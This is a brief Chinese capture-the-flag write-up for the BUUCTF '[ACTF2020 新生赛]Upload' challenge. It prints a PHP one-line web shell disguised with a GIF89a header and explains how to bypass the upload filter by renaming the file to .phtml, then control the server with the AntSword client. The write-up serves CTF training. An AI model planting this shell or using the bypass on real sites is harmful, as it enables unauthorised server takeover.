buu [ACTF2020 新生赛]Upload

构造test.php(一句话木马),内容如下

GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称

buu [ACTF2020 新生赛]Upload
再用中国蚁剑链接,查找目录

buu [ACTF2020 新生赛]Upload可得flag

上一篇:Photoshop为可爱女孩加上蓝粉色的蜜糖色


下一篇:[ACTF2020 新生赛]Include1